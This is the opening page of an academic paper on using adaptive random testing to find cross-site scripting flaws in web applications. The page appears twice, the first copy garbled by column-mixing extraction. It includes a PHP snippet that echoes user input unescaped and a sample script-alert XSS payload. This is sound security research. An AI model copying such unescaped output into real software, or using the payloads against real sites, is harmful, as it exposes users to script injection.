2019 26th Asia-Pacific Software Engineering Conference (APSEC) Adaptive Random Testing for XSS Vulnerability Chengcheng Lv',Long Zhang2.3.Fanping Zeng',and Jian Zhang2.3 ISchool of Computer Science and Technology,University of Science and Technology of China.Hefei.China 2State Key Laboratory of Computer Science,Institute of Software.Chinese Academy of Sciences,Beijing.China 3 University of Chinese Academy of Sciences,Beijing.China Email:lvcc@mail.ustc.edu.cn,zlong@ios.ac.cn.billzeng @ustc.edu.cn,zj@ios.ac.cn Abstract-XSS is one of the common vulnerabilities in web Stored XSS attack:The stored XSS vulnerability is a applications.Many black-box testing tools may collect a large variant of the cross-site scripting flaw,which is also number of payloads and traverse them to find a payload that can be successfully injected,but they are not very efficient. known as Type-II or persistent XSS vulnerability,and Previous research has paid less attention to how to improve the attackers can exploit such vulnerability to attack web efficiency of black-box testing to detect XSS vulnerability.To applications.An attacker can embed a malicious code improve the efficiency of testing,we develop an XSS testing tool. into a vulnerable server through an application such as It collects 6128 payloads and uses a headless browser to detect a forum and store it permanently.When a victim visits XSS vulnerability.The tool can discover XSS vulnerability quickly with adaptive random testing method.We conduct an such an infected site,the malicious code is provided to experiment using 3 extensively adopted open source vulnerable the victim as part of the web page benchmarks and 2 actual websites to evaluate the adaptive DOM based XSS attack:DOM based XSS attack is a random testing method.The experimental results indicate that new sub-class of reflected XSS attacks,which is also the adaptive random testing method can effectively improve the known as Type-0 XSS attack.In DOM based XSS fuzzing method by more than 27.1%in reducing the number attacks,malicious data does not touch web servers of attempts before accomplishing a successful injection. Keywords-XSS Vulnerability,Adaptive Random Testing, Instead,it is completely reflected by JavaScript code Fuzzing on the client side. There are many black-box testing tools for detecting I.INTRODUCTION XSS vulnerability.They do not know the internals of the Cross-site scripting attack (also known as XSS)is a web application and use fuzzing techniques over the web well-known security vulnerability in web applications.In HTTP requests [3].The approaches that can detect XSS an XSS attack,attackers usually manipulate malicious con- vulnerability are mainly divided into dynamic approach tent (malicious script)to disguise benign text,which can and static approach [4].The static approach detects XSS deceive a vulnerable web application.When executing a vulnerability by analyzing the response data.The detection web application,the victim usually treats the malicious text speed is fast but the false alarm rate is high and the alarms as the legitimate code of the application,and the victim's need to be confirmed manually.Therefore,the dynamic browser inadvertently executes the malicious content [1].In approach may be a better choice.It determines whether the report released by the Open Web Application Security user input is being parsed as code based on the behavior of Project (OWASP)[2]in 2017,XSS is listed as one of the the program at runtime.The dynamic approach could detect top 10 web vulnerabilities. XSS vulnerability more accurately,but consume more time For example,“echo“<b>".SuserName.“<b>":”isa and resources.At the same time,a website may have many piece of PHP code whose function is to display the different urls with risk of XSS vulnerabilities.Therefore,it user's name on the page.But when the user's name is is difficult for tools to perform a large number of test cases. "<script>alert('This is an XSS')</script>",the browser In this paper,we propose a dynamic detection tool with will execute the user's name as the page code and display the method of adaptive random testing (ART)[5]to detect "This is an XSS"in the window.Here,"<script>alert('This XSS vulnerability in web applications.We found that the is an XSS')</script>"is called XSS payload. reason why invalid payloads fail to be injected is that some XSS vulnerabilities can be divided into the following three keywords in payloads were filtered or converted,or the types [1]: payloads do not satisfy the context so the browser could Reflected XSS attack:Reflected XSS attack is currently not execute malicious code.We have observed that effective the most basic type of web vulnerability attack,which payloads tend to cluster together.Moreover,there usually are is also known as Type-I XSS attack or non-persistent some identical keywords in invalid payloads and effective XSS attack.When the victim clicks on a link containing payloads,some mutation in invalid payloads may result in malicious text(most commonly in HTTP query pa- successful injection.Therefore,after a payload fails to be rameters),the server script parses malicious text into injected,we can measure the distance between the failed malicious code (i.e.,reflected back),and the victim's payload and other payloads,then select the next payload that browser executes it. is most likely to be injected successfully to find vulnerability 2640-0715/19/$31.00©20191EEE 63 Do110.1109/APSEC48747.2019.00018Adaptive Random Testing for XSS Vulnerability Chengcheng Lv1, Long Zhang2,3, Fanping Zeng1, and Jian Zhang2,3 1School of Computer Science and Technology, University of Science and Technology of China, Hefei, China 2 State Key Laboratory of Computer Science, Institute of Software, Chinese Academy of Sciences, Beijing, China 3 University of Chinese Academy of Sciences, Beijing, China Email: lvcc@mail.ustc.edu.cn, zlong@ios.ac.cn, billzeng@ustc.edu.cn, zj@ios.ac.cn Abstract—XSS is one of the common vulnerabilities in web applications. Many black-box testing tools may collect a large number of payloads and traverse them to find a payload that can be successfully injected, but they are not very efficient. Previous research has paid less attention to how to improve the efficiency of black-box testing to detect XSS vulnerability. To improve the efficiency of testing, we develop an XSS testing tool. It collects 6128 payloads and uses a headless browser to detect XSS vulnerability. The tool can discover XSS vulnerability quickly with adaptive random testing method. We conduct an experiment using 3 extensively adopted open source vulnerable benchmarks and 2 actual websites to evaluate the adaptive random testing method. The experimental results indicate that the adaptive random testing method can effectively improve the fuzzing method by more than 27.1% in reducing the number of attempts before accomplishing a successful injection. Keywords—XSS Vulnerability, Adaptive Random Testing, Fuzzing I. INTRODUCTION Cross-site scripting attack (also known as XSS) is a well-known security vulnerability in web applications. In an XSS attack, attackers usually manipulate malicious con￾tent (malicious script) to disguise benign text, which can deceive a vulnerable web application. When executing a web application, the victim usually treats the malicious text as the legitimate code of the application, and the victim’s browser inadvertently executes the malicious content [1]. In the report released by the Open Web Application Security Project (OWASP) [2] in 2017, XSS is listed as one of the top 10 web vulnerabilities. For example, “echo “<b>”.$userName.“</b>”;” is a piece of PHP code whose function is to display the user’s name on the page. But when the user’s name is “<script>alert(‘This is an XSS’)</script>”, the browser will execute the user’s name as the page code and display “This is an XSS” in the window. Here, “<script>alert(‘This is an XSS’)</script>” is called XSS payload. XSS vulnerabilities can be divided into the following three types [1]: • Reflected XSS attack: Reflected XSS attack is currently the most basic type of web vulnerability attack, which is also known as Type-I XSS attack or non-persistent XSS attack. When the victim clicks on a link containing malicious text (most commonly in HTTP query pa￾rameters), the server script parses malicious text into malicious code (i.e., reflected back), and the victim’s browser executes it. • Stored XSS attack: The stored XSS vulnerability is a variant of the cross-site scripting flaw, which is also known as Type-II or persistent XSS vulnerability, and attackers can exploit such vulnerability to attack web applications. An attacker can embed a malicious code into a vulnerable server through an application such as a forum and store it permanently. When a victim visits such an infected site, the malicious code is provided to the victim as part of the web page. • DOM based XSS attack: DOM based XSS attack is a new sub-class of reflected XSS attacks, which is also known as Type-0 XSS attack. In DOM based XSS attacks, malicious data does not touch web servers. Instead, it is completely reflected by JavaScript code on the client side. There are many black-box testing tools for detecting XSS vulnerability. They do not know the internals of the web application and use fuzzing techniques over the web HTTP requests [3]. The approaches that can detect XSS vulnerability are mainly divided into dynamic approach and static approach [4]. The static approach detects XSS vulnerability by analyzing the response data. The detection speed is fast but the false alarm rate is high and the alarms need to be confirmed manually. Therefore, the dynamic approach may be a better choice. It determines whether user input is being parsed as code based on the behavior of the program at runtime. The dynamic approach could detect XSS vulnerability more accurately, but consume more time and resources. At the same time, a website may have many different urls with risk of XSS vulnerabilities. Therefore, it is difficult for tools to perform a large number of test cases. In this paper, we propose a dynamic detection tool with the method of adaptive random testing (ART) [5] to detect XSS vulnerability in web applications. We found that the reason why invalid payloads fail to be injected is that some keywords in payloads were filtered or converted, or the payloads do not satisfy the context so the browser could not execute malicious code. We have observed that effective payloads tend to cluster together. Moreover, there usually are some identical keywords in invalid payloads and effective payloads, some mutation in invalid payloads may result in successful injection. Therefore, after a payload fails to be injected, we can measure the distance between the failed payload and other payloads, then select the next payload that is most likely to be injected successfully to find vulnerability 63 2019 26th Asia-Pacific Software Engineering Conference (APSEC) 2640-0715/19/$31.00 ©2019 IEEE DOI 10.1109/APSEC48747.2019.00018